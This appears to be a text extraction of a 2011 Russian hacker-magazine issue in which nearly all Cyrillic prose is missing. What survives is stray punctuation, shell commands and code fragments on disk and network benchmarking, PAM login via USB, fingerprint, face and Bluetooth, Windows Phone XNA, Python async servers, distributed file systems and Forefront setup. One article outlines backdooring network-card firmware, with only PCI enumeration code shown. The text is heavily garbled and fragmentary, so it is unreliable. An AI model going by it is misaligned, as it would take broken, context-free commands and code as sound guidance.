AVG Method: MEMCPY Copy: 5372.418 MiB/s
AVG Method: DUMB Copy: 7563.436 MiB/s
AVG Method: MCBLOCK Copy: 13755.269 MiB/s
sysbench .
$ sysbench --test=memory run
X 09 /152/ 2011
HDD
HDD . , hdparm:
hdparm -t /dev/sda
2,5" HDD 5400RPM 75,80 MB/sec. SSD Intel

320 222,93 MB/sec. , .
,
sysbench. -, :
seqrd ;
seqwr ;
seqrewr ;
rndrd ;
rndwr ;
rndrw .

. , . , :
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd prepare
test.
'--file-total-size' , , . :
$ sysbench --file-total-size=10G --test=fileio \
--file-test-mode=seqrd run
099
UNIXOID
.
iozone.xls (
), , /.
LibreOffice
. - , ,
. iozone ,
gnuplot.
sysbench:
- . ,
Phoronix Test Suite ( PTS).
GPLv3.
,
, Ubuntu:
( ):
# apt-get install phoronix-test-suite
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd cleanup
:
*
*
*
*
seqrd
seqwr
rndrd
rndwr
42.675Mb/sec,
47.377Mb/sec,
1.3463Mb/sec,
1.5153Mb/sec,
2731 IOPS
3032 IOPS
87 IOPS
97 IOPS
263.1Mb/sec, 16838 IOPS

121.95Mb/sec, 7804 IOPS
390.63Mb/sec, 25000 IOPS
70.559Mb/sec, 4515 IOPs
SSD:
*
*
*
*
seqrd
seqwr
rndrd
rndwr
bonnie++.
: ( ),

.
CPU ( ) . bonnie++
plain-text 80 , .
html:
$ bonnie++ -n 1024 | tail -1 | bon_csv2html \
> bon_result.html
'-n' ,
(
1024). , /
, (
+++++).
SSD (129 Mb/sec)
(315 Mb/sec) , sysbench.
48348 ,
6464 .
1090971 .
, , , iozone.
:
$ iozone Ra g 10G > iozone.xls
'-a' , '-R' Excel

, '-g'
( ). ,
100
PHP
. , (phoronix-testsuite.com) deb- . Live-,
, 3.4 ( )
. Live- ,
,
.
3.0 GUI, , PHPGTK2, , . ,
- GUI CLI- ,
. ,
:
$ phoronix-test-suite interactive
:
$ phoronix-test-suite list-available-tests
:
/
.
openbenchmarking.org,
allow_url_fopen, file_uploads, allow_url_include PHP.
,
. : System, Processor, Memory,
Disk, Graphics, Network .
, Network : Loopback TCP Network Performance.
PTS 3.2.1 118 46
.
, - . ,
:
$ phoronix-test-suite info compress-7zip
, , ,
( ,
, 10 ). ,

$ phoronix-test-suite make-download-cache
~/.phoronix-test-suite/download-cache/,
.
7-zip:
$ phoronix-test-suite benchmark compress-7zip
X 09 /152/ 2011

PTS
7-zip . PTS
, , - .
.
, PTS . , . :
$ phoronix-test-suite list-available-suites
, compilation:
*
*
*
*
*
pts/build-apache
pts/build-php
pts/build-mplayer
pts/build-linux-kernel
pts/build-imagemagick

, .
$ phoronix-test-suite list-available-virtual-suites
, :
* all ;
* installed ;
* system|processor|graphics
.
PTS HTML-,
. merge-results.
show-result.
, PTS -
.
, openbenchmarking.org , PTS
. , ( )
.
300 .
Linux
. , ,
, .
, openbenchmarking.org,

PTS, , , . PTS
openbenchmarking.org :
X 09 /152/ 2011
Phoronix Test Suite

$ phoronix-test-suite openbenchmarking-login
PTS
. openbenchmarking.org
: ~/.phoronix-test-suite/test-profiles/pts,
, , , .
, build-php ,
php 5.2.9, , .
downloads.xml -
pre- postinstall.sh.
? , , speedtest.net internet.yandex.ru.
- (,
Ubuntu). , - .
?
nc.
nc, 1234:
$ nc -q 0 -l 1234 > /tmp/big_file
- ,
:
$ time cat /tmp/big_file | nc -q0 server_IP 1234
, ,
, iperf.
:
# apt-get install iperf
:
$ iperf -s
TCP/5001. :
$ iperf -c server_host
Bandwidth .
, '-t' .
iperf TCP-. UDP, '-u' . UDP
, ,
. z
101
UNIXOID
(execbit.ru)

,
?
, , ,
SSH
, ?
, , ,
.
. sexhero iamsuperman
.
,
, ,
-
102
, ,
. XXI , ,
,
,
. .
, - , ,
- .
X 09 /152/ 2011
fprint_demo libfprint

. :
, ,
.
, .
,
( ,
). ?
USB-. , ,
,
, .
,

PAM- pam_usb (pamusb.org),
,
,
.
, , .

, , ,
,

( - ,
,
, ).

, , pam_usb
. (SD, MMC) . pam_usb
. .
1. libpam_usb.so :
$ sudo apt-get install libpam-usb pamusb-tools
2. ,
, USB-
:
$ sudo pamusb-conf --add-device
X 09 /152/ 2011
pam_usb pam_fprint PAM

pam_usb
, 2 . Udisks ( ,
,
-), ,
.
3. pam_usb ,
(
vasya):
$ sudo pamusb-conf --add-user vasya
4.
, . -
, :
$ sudo pamusb-check vasya
5. pam_usb ,
. Ubuntu ,
Debian, /
etc/pam.d/common-auth.
( ):
\auth required pam_unix.so
:
auth sufficient pam_usb.so
PAM, pam_usb,
, . ,
, , sufficient
required. ,
, ( , ), pam_usb
, pamusb-agent.
pamusb-agent
.
, /etc/pamusb.conf :
INFO
info
/etc/
pam.d/common-auth
Gentoo Mandriva
/etc/
pam.d/system-auth,
FreeBSD
/
etc/pam.d/system.
ArchLinux
PAM-

.

/
etc/nologin SSH-.

root
.
103
UNIXOID

USB-Flash
/etc/pamusb.conf
USB-
<user id="_">
<device>_</device>
...
<agent event="lock">
gnome-screensaver-command --lock</agent>
<agent event="unlock">
gnome-screensaver-command --deactivate</agent>
...
</user>
Gnome. pamusb-agent
, gnome-screensaver-command --lock gnomescreensaver-command --deactivate .
pamusb-agent :
$ pamusb-agent
, :
$ cd ~/.config/autostart
$ ln -s /usr/bin/pamusb-agent pamusb-agent
pam_usb
, -.
SD- ,
, (
USB-). , .
. ,
,
Windows. freedesktop.org
fprint (www.freedesktop.org/wiki/Software/fprint),

PAM-,
.
libfprint ,
:
$ sudo apt-get install libfprint0 \
libpam-fprint fprint-demo
104
$ fprint_demo
, .
pam_fprint_enroll,
, :
# pam_fprint_enroll enroll-finger 7
7 .
fprint , 1 , 10 .
, pam_fprint PAM , /etc/pam.d/
common-auth, auth required pam_unix.so
, pam_fprint:
auth sufficient pam_fprint.so
, .
,
, -.
,
, ,
.
Linux- ,

pam-face-authentication (www.pam-face-authentication.
org), ,
, PAM- .

Ubuntu. , ,
. ,
,
. Ubuntu ( )
, :
$ sudo apt-get install build-essential cmake \
qt4-qmake libx11-dev libcv-dev libcvaux-dev \
libhighgui4 libhighgui-dev libqt4-dev \
libpam0g-dev
X 09 /152/ 2011
:
$ cd
$ wget http://goo.gl/dpD1s
$ tar -xzf pam-face-authentication-0.3.tar.gz
cmake, :
$ cd pam-face-authentication-0.3
$ cmake && make
$ sudo make install
Ubuntu antonio.chiurazzi:
$ sudo add-apt-repository ppa:antonio.chiurazzi/ppa
$ sudo apt-get update
$ sudo apt-get install pam-face-authentication
:
$ qt-facetrainer
, Capture.
, .
. .
pam_face_authentication.so PAM-. /etc/pam.d/gdm /
etc/pam.d/kdm ( KDE)
:
auth sufficient pam_face_authentication.so enableX
/etc/pam.d/common-auth , ,
/bin/login /bin/su, pam_face
.
PAM-. () /usr/share/pam-configs/face_authentication
:
Name: Manually installed face_authentication profile
Default: yes
Priority: 900
Auth-Type: Primary
Auth:
[success=end default=ignore]
pam_face_authentication.so enableX
:
$ sudo pam-auth-update --package face_authentication
21- . ,
,
, , ,
.
?
, . USB-, , . , , MAC-,
IMEI, .
,
X 09 /152/ 2011
MAC- Bluetooth.
, Bluetooth , , MAC,
Bluetooth-.
, USB
,
. ,
.
, Bluetooth, ,
.
hcitool ( bluez-utils) :
$ hcitool scan
MAC-, . libpam_blue (
pam_blue, ):
$ sudo apt-get install libpam_blue
/etc/security/bluesscan.conf
:
#
general {
# ( 3 15)
timeout = 15;
}
#
mylogin = {
name = ;
bluemac = MAC- ;
}
, /etc/pam.d/
common-auth :
auth sufficient pam_blue.so
, pam_unix.so.
.
pam_blue, , MAC-
. .
Linux .
,
,
. ,
,
, ,
.
,
. . ,
. , , ,
. , , ,
. z
105
CODING
yurembo (yazevsoft@gmail.com)
WINDOWS
PHONE 7.1
,
!
Microsoft
Windows Phone 7.1 Mango.
(
)
,
.
-: , .
, , .
, . ,
.
Windows Phone 7.0
.
, . ,
,

. ,
106

Windows Phone Marketplace-. .
DevCon11
Microsoft , Windows Phone 7.1 (Mango)
.
( :), ,

. WP (
), .
, , : ,
.
.
X 09 /152/ 2011
DVD
dvd

. !
. 1.
. 2.
Windows Phone 7.1 Mango
XNA .

( Windows
Phone Rich Graphics Application (4.0)).
,
XNA. . XNA DirectX. ,
, ,
,

. , Microsoft ,
: Windows,
Xbox 360 Windows Phone 7.x.
, , Windows,
. ,
XNA.
.NET Framework
(2002 ) ,
( ,
), ,
Managed DirectX
DirectX, .NET.
DirectX, C++, , . MDX 2.0. : ,
(, , .NET)
,
. , . Microsoft
DirectX , SDK
. 2006 XNA,
SDK,
, , , DirectX.
API,
,
( .), XNA
.

.NET Framework, (
PC ( Windows) Xbox 360).
,
WP, ,
Windows. ,

Microsoft Windows Mobile 6.5,
eMbedded Visual tools,
eMbedded Visual
Basic eMbedded Visual C++.
, Visual Studio 2010,
.NET Framework 4.0 ( , ,
WP 7.1) , ,
Windows Phone Developer Tools
WP 7.1,
Microsoft). , , : Visual Studio 2010 Express,

WP, .NET Framework 4.0, Silverlight 4.0, XNA 4.0, Windows
Phone Emulator. , ( )
WP 7.1,
DirectX 10.

Windows Vista -,
Windows 7 Starter Edition ( ,
:)).
, VS 2010,
C# Visual Basic
. WP-, VS 2010
(. 1).
XNA vs. Silverlight
Windows Phone : Silverlight XNA. .NET. , Windows

Phone .
, Silverlight
( ,
, Windows). ,
XAML
, VS
.
(
), . ,
X 09 /152/ 2011
3D-

Windows Phone 7.1.

.

.
HTTP://WWW
links
create.msdn.com

WP .
INFO
info

,

3D-.
.
trueSpace
. : www.caligari.com.
107
CODING
spriteBatch.Begin();
spriteBatch.Draw(background, new Rectangle
(0, 0, 800, 480), Color.White);
spriteBatch.End();
. 3. 3D
? 3D- WP 7.1.
VS 2010
Visual C# XNA Game Studio 4.0 Windows Phone Game
(4.0).
. .
WP (480800),
,
. WP
30 fps ( ,
TargetElapsedTime). , WP, DirectX 10, WP DX 9.
, , DX 9. XNA , DX ,
. PC Xbox 360
HiDef,
, DX.
, WP , Reach,
DX 9 .
,
- .
, XNA 4.0 .
. ,
(. 2).

( ).
.
background.jpg. , , , XNA.

. , , , ,
,
. ,
, .

,
. -, Game1.cs,
Game1 :
this.graphics.PreferredBackBufferHeight = 480;
this.graphics.PreferredBackBufferWidth = 800;
this.graphics.IsFullScreen = true;
, . LoadContent() spriteBatch
: background = Content.
Load<Texture2D>("Textures/background");. .
Draw, TODO :
108
SpriteBatch: Begin
( ),
, .
. Draw . (
, ):
, (
). (-, , . .)
SpriteBatch , Begin.
:
. . XNA : *.x *.fbx.
DirectX, ,
, . ,
*.sdkmesh, . Microsoft

meshconvert,
X sdkmesh. *.fbx
Autodesk. , .

.
( trueSpace , ). -.
, ,
, -
.
.

, - ,
.

, ,

. object.cs
,
( ).
, , .
, ,
, XNA.
. . ,
, ,
. ,
,
. ,
.
C# .
Delphi :).
,

, XNA, Y
. DrawObj,
X 09 /152/ 2011
, model.
.
foreach ,

.

. BasicEffect : , - ,
, ,
. ,
, DirectX
. , DX 10, , .
-,
. , , .
XNA , . DrawObj
( foreach) .
, UpdateState,

rotMat-
.
SetupEffects .
,
. , .
trans,
( DrawObj (. ).
,
Game1,
Microsoft.Xna.Framework.Game, .
, ,
. Game1 , , Object Object car1 = new
Object(20); ,
,
. . :
projectionMatrix = Matrix.CreatePerspectiveFieldOfView
(MathHelper.ToRadians(45.0f),aspectRatio,1.0f,100.0f);
viewMatrix = Matrix.CreateLookAt(cameraPosition,
Vector3.Zero, Vector3.Up);
:
Y , ( ), .
:
( ,
X,Y,Z), , . LoadContent
, : car1.model = Content.
Load<Model>("Models/Hotrod");
:
car1.SetupEffects(projectionMatrix, viewMatrix);,
. Update,
Draw ,
Object.
UpdateInput,
, ,
. Draw
X 09 /152/ 2011
. , Object.
base.Draw(gameTime); . , , .
.
, , 3D (. 3).
. - *.wav- (, ) . : ,
, :
SoundEffect sound; //
SoundEffectInstance soundControl; //
bool isPlay = false; //
LoadContent , ,
:
sound= Content.Load<SoundEffect>("Music/jets014");
soundControl = sound.CreateInstance();
soundControl.IsLooped = true;
soundControl.Play();
isPlay = true;
UpdateInput Back :
if (GamePad.GetState(PlayerIndex.One).Buttons.Back ==
ButtonState.Pressed) {
if (isPlay) {
soundControl.Pause();
isPlay = false;
} else {
soundControl.Play();
isPlay = true;
}
}
.
. , ,
, , :)!

WP 7.1 , ,
.
,
: ,
. ,
Windows Phone 7.1.
, ,
( ,
WP7.1 :)) Windows
Phone Marketplace (,
2900 ).
,
, !
Windows Phone
! z
109
CODING
(stannic.man@gmail.com)
:
( , )
. (
) . ,
, ,
? !
110
X 09 /152/ 2011
(NIC)
RJ45
PHY block

Ethernet
MAC block

PCI-
NIC
()
NIC <===> PCI

, ,
,
,
, .
, ?
, ,
...
- . ...
.

.
(!)
SSH-,
. -,
( )
(prooflink: alchemistowl.org/arrigo/Papers/
Arrigo-Triulzi-PACSEC08-Project-Maux-II.pdf,
radioradar.net/news/electronics_news/avr_crumb644_net.
html).
, , : , , ,
-
. -Apache,
,
, , - PCI-

, , .
,
, ,

. , . . - ,
, .
,
, , ,
X 09 /152/ 2011
.
,
,
?

.
,
,
. , firmware
, , - .
, ,
.

TDI-NDIS-
NDIS-, , , ,
NdisRegisterProtocol.
. , , TDI NDIS IM- .
,
, .
NDIS_
MINIPORT_BLOCK
,
NDIS_MINIPORT_BLOCK !

NdisRegisterProtocol,
,
.
?
,
,
, PCI.
PCI-,
( ) , PCI-

() PHY MAC-.
RJ45- ,
DVD
dvd

pdf-,
PCI-,

, ,

PCI,
,
,

, .
HTTP://WWW
links

alchemistowl.org/
arrigo/index.html,
Arrigo Triulzi,

.
111
CODING
MAC-.
, ().
CPU, EEPROM-,
SRAM- , . EEPROM, , , MAC- ,
. EEPROM
. SRAM-
firmware, ,
/ . ,
,
. ,
,
.
EEPROM,
SRAM ? , .
PCI-.
PCI- , linear
burst ( ). ,
( ) ,
.

.
PCI , , Plug and Play (PnP).
PCI :
( /,
Microsoft) configuration space .
PCI
PCI Bus Demystified Doug Abbott,
.
PCI-, ,
, ,
PCI-. , :), ,
TDI NDIS, ,
. : ,
.
PCI -,
(memory-mapped I/O).
, , 64 .
32 , 32 / SRAM- .
, ,
PCI-.
PCI-
for (busNumber = 0; !adapterFound && moreBuses; busNumber++)
{
for (deviceNumber = 0;
!adapterFound && deviceNumber < PCI_MAX_DEVICES;
deviceNumber++) {
slotNumber.u.bits.Reserved = 0;
slotNumber.u.bits.DeviceNumber = deviceNumber;
slotNumber.u.bits.FunctionNumber = 0;
length = HalGetBusData(PCIConfiguration,
busNumber,
slotNumber.u.AsULONG,
112
configInfo,
sizeof(PCI_COMMON_CONFIG) );
}
}
, ,
EEPROM , EEPROM .
? -, EEPROM
non-volatile-. -,
. -,
, EEPROM . EEPROM?
, , ,
, ,
MAC-, firmware-,
: , , PXE (Preboot eXecution
Environment, ) .
, frimware
EEPROM ?
! ,
, :). ? ,
, (
PCI-):
. EEPROM
firmware ( ) EEPROM.
. firmware, , , ;
firmware,
;
MAC- .
, , ,
. , , , , : ,
? : ,
, - . ,
,
.
firmware, , ...
firmware,
. , .
, ,
,
. , , PoC,
.

? ! ,
, . , ,
, . , ,

, EEPROM,
, , , firmware.
PCI .
: PCI-based .
, , ,
. ,
:). ,
! z
X 09 /152/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
CODING
(adil.khashtamov@gmail.com, http://khashtamov.kz)
-
Python
,
-
.
? , !
?
, ,
.

(
, , ). -, ,
,
, . ,
. , , .
, .
10 , ,
10 . ,
114

DOS-.
, , .
, , . :
s = socket.socket(...)
s.setblocking(ISBLOCKING)
s.connect((host,port))
data = s.recv(1024)
# -
s.close()
, ,
.
X 09 /152/ 2011
Twisted

tornadoweb.org Tornado.
twistedmatrix.com
Twisted.
gunicorn.org WSGI Python-.
gevent.org , libevent.
nichol.as asynchronous-servers-in-python-

Python.
pycon.blip.tv PyCon.
, , ,
,
. , , ,
, // .
- -.
, Windows select(), Linux epoll(), poll(), FreeBSD
kqueue(). , ][
, horiffic, ,
.
(xakep.
ru/magazine/xa/042/058/1.asp . .).
, , ,
. ,
, .
.
, ? Python-
, . , ,
Django, ][
. (, ). ,
?
X 09 /152/ 2011
Tornado
, .

FriendFeed. , 2009
Facebook, . Tornado ,
,
.
Tornado. , ,
Django, .
, ! ,
Tornado .
, ,
. , web.py,
Tornado ,
:)
demos , , .
?
-? Tornado -.
MVC (model-view-controller),

, Django.

Twitter, Facebook, Google ,
. . MySQL,
,
Tornado , , MySQL-,
.
PostgreSQL,
MySQL
.
115
CODING
Tornado
Hello world Tornado :
Hello world Tornado
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world")
application = tornado.web.Application([
(r"/", MainHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()
Tornado web.py .
http-,
front-end- nginx, -.
.
:
1. ,
.
2. ,
.
3.
. , .
:
1. .
2. Tornado , .
Twisted
, Twisted
Python.
116
, .
: TCP/UDP, SSL/
TLS, HTTP, SSH, FTP, IRC, NNTP, XMPP .
Twisted ,
.
, Twisted ,
, ,
. , Twisted
,
. ,
. , Twisted . , Twisted Tornado.
,
Python,
. , -
Twisted, , ,
, Tornado. Twisted (
Tornado Django)
SQL-.
:
1. .
2. .
:
1. , .
2. .
Gunicorn + Gevent
, , Python web-,
.
PyCon,
. WSGI-
Gunicorn Gevent (
WSGI- libevent).
, Gevent , , ,
. Gevent
()
, ,
X 09 /152/ 2011
asyncore
libevent ( Chromium, memcached),
,
. , ,
Gevent
libev, , libevent.

, urllib, ftplib - . ,
, ,
Gevent. , , Gevent:
Gevent
urls = ['http://www.google.com', 'http://www.yandex.ru',
'http://www.python.org']
import gevent
from gevent import monkey
monkey.patch_all()
import urllib2
def print_head(url):
print (' %s' % url)
data = urllib2.urlopen(url).read()
print ('%s: %s : %r' % (url, len(data), data[:50]))
jobs = [gevent.spawn(print_head, url) for url in urls]
gevent.joinall(jobs)
, Gevent
. , monkey.patch_all()
,
,
. , urllib2
,
,
.
X 09 /152/ 2011
:
1. .
2. .
:
1. .
2. , .
asyncore
,
, asyncore.
Asyncore -
( callback), , ,
. asyncore , NIH- (NIH not invented
here), , . , ,
,
, ,
.
, .
! , ,
, .
, - : ,
, ,
.
. ,

,
. ? ,
,
. , , ,
.

Django, . ,
, , ... z
117
CODING
deeonis (deeonis@gmail.com)
Python
-, , , . .
, , ,
. , .
, .
-
, ,
. . ,
, (,
) ,
.
, . -

,
. , .
- , , ,
- , , .
, , . , , .

. ,
, .
:

class MobilePhone
{
public:
void display() = 0;
void makeSound()
{
//
};
...
}
class Nokia3310 : public MobilePhone
{
void display()
118
{
//
};
}
class SiemensA35 : public MobilePhone
{
void display()
{
//
};
}
MobilePhone, : display() makeSound().

makeSound ,
. display ,
-,
.
, , mp3-. mp3
- ( ),
. ,
mp3 , . - !
, makePhoto
MobilePhone. ,
, Nokia 3310 -
:).
makePhoto
class MobilePhone
{
public:
void display() = 0;
void makeSound()
{
X 09 /152/ 2011
UML-
//
};
...
//
void makePhoto()
{
//
};
}
...
Nokia3310 mobilePhone;
// Nokia
//
mobilePhone.makePhoto();
.

.
( SMS) . , ,
makePhoto ,
, , ,
. , ,
mp3-.
.
, , X 09 /152/ 2011
,
. , , Java PHP,
C++ . ,
.
() iPhotoCamera,
makePhoto.
MobilePhone.
iPhotoCamera, 3310
.
iPhotoCamera
class iPhotoCamera
{
void makePhoto() = 0;
}
...
class MotorolaL9 : public MobilePhone, public iPhotoCamera
{
void makePhoto()
{
// ,
};
...
}
class MotorolaL7 : public MobilePhone, public iPhotoCamera
{
119
CODING
void makePhoto()
{
//
// ,
return;
};
}
C++
void makePhoto()
{
// , , , MotorolaL9
//
};
...
}
, , ,
, .
,
makePhoto(). - . , cpp makePhoto iPhotoCamera, ,
,
. : , CMOS
CCD...
makePhoto, .
, .
.
,
.
,
. ,
iPhotoCamera, , . , makePhoto
.

, iPhotoCamera. C++
:
makePhoto()
class iPhotoCamera
{
void makePhoto() = 0;
}
class DoPhoto : public iPhotoCamera
{
void makePhoto()
{
// ,
};
}
class CantDoPhoto : public iPhotoCamera
{
120
, : DoPhoto CantDoPhoto.
iPhotoCamera
makePhoto(). , ( ) . DoPhoto , CantDoPhoto
, makePhoto .

, . , 3310
. mp3-.
mp3
class iPhoneSound
{
void makeSound() = 0;
}
class PolyphonySound : public iPhotoSound
{
void makeSound()
{
// ,
};
}
class Mp3Sound : public iPhotoSound
{
void makeSound()
{
// , mp3
};
}
, . iPhoneSound
PolyphonySound Mp3Sound makeSound(). ,
,
, .

. mp3
-
.
,
.
. -
.
MobilePhone ,
iPhoneCamera, iPhoneSound.
MobilePhone
class MobilePhone
{
protected:
iPhotoCamera &photoBehavior;
iPhotoSound &soundBehavior;
public:
X 09 /152/ 2011
Nokia3310 nokla;
// 3310 ,

nokla.makePhoto();
//
nokla.makeSound();
Java
.

void display() = 0;
void makeSound()
{
soundBehavior.makeSound();
};
void makePhoto()
{
photoBehavior.makePhoto();
};
}

MobilePhone makePhoto makeSound, photoBehavior soundBehavior. ,

photoBehavior soundBehavior . , :
MobilePhone
class MotorolaL9 : public MobilePhone
{
MotorolaL9()
{
photoBehavior = new DoPhoto();
soundBehavior = new Mp3Sound();
};
}
-
. ,
. ,
.
,
.
, , .
, photoBehavior
soundBehavior MobilePhone,

? ,
. , mp3- , set-,
soundBehavior.

class MotorolaL9 : public MobilePhone
{
MotorolaL9()
{
photoBehavior = new DoPhoto();
soundBehavior = new Mp3Sound();
};
void setIPhoneSound(iPhoneSound &sound)
{
soundBehavior = sound;
};
}
...
MotorolaL9 motor;
// mp3
motor.makeSound();
//
motor.setIPhoneSound(new PolyphonySound());
//
motor.makeSound();
class Nokia3310 : public MobilePhone

{
Nokia3310()
{
photoBehavior = new CantDoPhoto();
soundBehavior = new PolyphonySound();
};
}
. , ,
,
.
.
...
MotorolaL9 motor;
//
motor.makePhoto();
// mp3
motor.makeSound();
X 09 /152/ 2011
, . ,
,
.
. z
121
SYN/ACK
(execbit.ru)
,
, ,

. ,
, .
,
,
. , ,
, .
,
( - ?)
, ,
. , ,
,

,
.
,
, .
:
1. . ,

. NFS UNIX CIFS Windows.

. ,
.
2. . , . ,
, .
GFS/GFS2 Red Hat OCFS2 Oracle.
, .
3. .
. ,

, ,
. GRID,
, . : Lustre, Ceph,
GlusterFS GoogleFS,
Google.
122
, ,
.
NFS, CIFS POHMELFS
,
( ,
UNIX) NFS,
Network File System.
NFS Sun Microsystems ( Oracle)
2.0 1989 , RFC1094 ( ,
, , , Sun).
, NFS
.
, (RPC), ,
. NFS
,
SunOS,
. NFS
-
, .
. , ,
NFS-,
(/etc/exports /etc/hosts.
allow) nfsd.
, .
,
, NFS
.
NFS .
, NFS

.
.

, X 09 /152/ 2011
POHMELFS,
Linux
( ).
NFS ,
cachecoherent. NFS ,

,
.
, A
(, ,
, ..),

, , ,

. readonly ,
,
, , .
NFS ,
.
.
OCFS2 GFS2

.
, ,
X 09 /152/ 2011

.
, ,
,
, .
, , SAN,
FibreChannel, iSCSI
AoE.
,
, ,
, .

.
, RAID,
SAN .
,
.
,
INFO
info

-
RADOS (http://ceph.
newdream.net/wiki/
RADOS_Gateway)

Ceph Amazon
S3.
123
SYN/ACK
Ceph ,

OCFS2
,
.
, ,
,
,
. , ,
.
, .
,
.
,
, , ,
.
inode. ,
,
inode , ,
GFS2 OCFS2, -
124
. ,
,
.

. -, ,

(, GFS2 DLM Distributed Lock Manager).

,
, . ,
,
NFS
.
,

(GPS2 OCFS2 ).
, -,
, , ,
.
fencing ,
, ,
, .
,
, ,
, , ,

.
,
.
. , (
), , ,
(
- ). ,
-
, ,
, X 09 /152/ 2011

POHMELFS (http://www.ioremap.net/projects/
pohmelfs),
Linux, ,
. :

( NFS).
.
.

( RAID)
.

.
.
NFS, POHMELFS ,

,

.
, .

,
,
-
. ,
,
,
.
Luste, Ceph GlusterFS

, ,
,
, ,
, ,
.

,
,
Lustre.
Lustre (www.lustre.com) Cluster
File Systems, Sun Microsystems 2007
. Lustre ( Linux
Cluster) ,

.
Lustre
, ,
.
:
1. (MDS),
, , , ,
..
.
/ ,
X 09 /152/ 2011
OCFS2
.
2. (OSS).
, , .
/
, ,
,

.
(OST),
, ,
.
3. (MGS). . MGS
.
, Lustre,
:
, . ,
,
() , .

(, /lustre).
/ -
,
, .
()
,
(

, ).
Lustre
.
125
SYN/ACK
Ceph Lustre
, ,
,
(,
,
,
).
Lustre
, POSIX
, . Lustre , -
Lustre-
,
,
.
, .
Ceph GlasterFS.
Ceph (http://ceph.newdream.net)
2007 , ,
, Lustre, . Fuse,
Linux, Linux, 2.6.34.
Ceph
. ,
.
,
.
, ,
,
, ,
.
.
Ceph . , ,
Linux-,
.
,
Fuse, Linux, BSD Mac OS X.

.
,
,
.
, , . z
126
X 09 /152/ 2011
SYN/ACK
grinder (grinder@ua.fm)

Forefront Endpoint Protection:
Windows
2010 Microsoft
Forefront Endpoint Protection, . ,
, .
Forefront Endpoint Protection

, .
. ,
, Microsoft. , ,
, , .
,
, . NAP (Network
Access Protection), Win2k8 (
12 ][ 2008 ).
, MS , Forefront ( Stirling, , ,
),
ISA Server, Intelligent Application
Gateway, Identity Lifecycle Managek .
Forefront , , , .
MS . ,
. MSRT (Malicious Software Removal
Tool), OneCare Windows Defender,
. MS Security
Essentials (Morro), WinXP-Win7. MSE ( ), MSE
.
Forefront Endpoint Protection, Win, , ,
. Forefront Client Security,
. FEP 2010 2010
. FEP 2012, -
.
FEP 2010
, ,
, ,
. , FEP
128
, , .
Windows, Windows Firewall,
AppLocker,
. ,
, . ,
,
, - .
FEP c IPS ( ) Network
Inspection System (NIS). , NIS
Forefront TMG 2010, FEP
, . Network Access Protection (NAP).
(Dynamic translation
and Emulation),
, . ,
. , ,
Microsoft Security Essentials
DSS (Dynamic Signature Service).
, (, ), ,
,
Microsoft DSS, SpyNet MRS (Microsoft
Reputation Services). ,
, , .
,
, .
, FEP ,

. FEP
,
,
.
, -
. ,
.
. ( X 09 /152/ 2011
HTTP://WWW
links

Forefront microsoft.
com/forefront.
TechNet,
Forefront Endpoint
Protection clck.ru/
FwSw.
-
( )
Forefront Endpoint
Protection clck.ru/
FiXr.
) , FEP

. ,
,
.
WinXP3/Vista/7
Win2k3/2k8/2k8R2.
Win7 Starter, Win7
Home Vista Basic .

. FEP
,
System Center Configuration Manager. ,
, FEP
.
, ,
SCCM (
08 ][ 2009 ).

,
,
. . ,
, .
FEP, ,
SCCM .
.
, FEP , , :).
SCCM 2007
R3 Win2k8R2
, FEP
2012, 2010.
FEP 2012 SCCM 2012,
.

, Win2k8R2. , .
X 09 /152/ 2011
(
), ,
SCCM 2012, Outlook,
. ,
.
FEP 2010
SCCM 2007 R3, FEP.
R3 ,
SP2, .
SCCM 2007 SP2
08 ][ 2009 ).
, Win2k8R2
,
:). . SCCM 2007,
Win2k3SP2/Win2k8/
R2 SQL Server 2k5SP3/2k8/R2.
, SQL
Analysis Services, Integration Services Reporting Services.
,
. ,

MSSQL , Standart/Enterprise.
,
SQL-
FEP Analysis
Reporting. MSSQL, SQL Server
Agent .

SPN (Service Principle Name) MSSQL.
:
INFO
info

Forefront UAG

09 ][ 2010
.
Forefront
TMG

11 ][ 2009
.
NAP

12 ][ 2008
), SCCM

08
2009 .
>setspn -A MSSQLSvc/srv01.example.org:1433
example\mssqlserver
Registering ServicePrincipalNames for
CN=Mssqlserver,CN=Users,DC=example,DC=org
MSSQLSvc/srv01.example.org:1433
Updated object
, , , , SPN
129
SYN/ACK
Forefront Endpoint Protection 2010
FEP, SCCM

, .
-d
.
, .
:
[Verbose] Retrieved SQL server account: Internal:
'EXAMPLE\ mssqlserver'; External: 'EXAMPLE\mssql'
[Verbose] Retrieved SQL SPN: MSSQLSvc/SRV01
[Verbose] Validating SPN. Account: EXAMPLE\mssqlserver.
SPN: mssqlsvc/srv01
Win2k8R2:
PS> Import-Module servermanager
PS> Add-WindowsFeature BITS,RDC,Web-WMI,Web-Dav-Publishing
SCCM 2007 SP2 .

R3 KB977384 (support.microsoft.
com/kb/977384) KB2271736 (support.microsoft.com/kb/2271736).

.
Forefront
Endpoint Protection 2012
FEP. FEP
Microsoft Forefront
Endpoint Protection 2010 (clck.ru/G-1V), ,
FEP.
, .
, , , . ,
SCCM
, MS.
, FEP 2010
:). .
.
( , 2012 ,
-):
Basic topology , SCCM, ;
Basic topology with remote reporting database , ,
;
130

Advanced topology ,
, ..
Install only Configuration Manager Console Extension for FEP 2010
SCCM 2007.
,
Advanced topology .
Reporting Services. URL
. URL, , FQDN .
, MS FEP Windows
Update. , .
Microsoft SpyNet.
. Basic, MS .
, , Advanced . . , ,
.
, .
, ,
. , . ,
.
X 09 /152/ 2011
FEP ,

FEP,
,
, , .
,
SCCM
( , MSSQL)
. ,
, SCCM .
SCCM Computer Management
Forefront Endpoint Protection,
, .
Policies ( ), Alerts ( 4 ) Reports ().
, FEP-*,
Computer Management Desired Configuration Management
Configuration Baselines. . ,
SCCM.
. ,
( ]
[ 08.2009), . Distribute
Software. ,
Select an existing package Microsoft Corporation FEP
Deployment 1.0. ,
, ,
.
, . ,
. , , Deployment Overview.

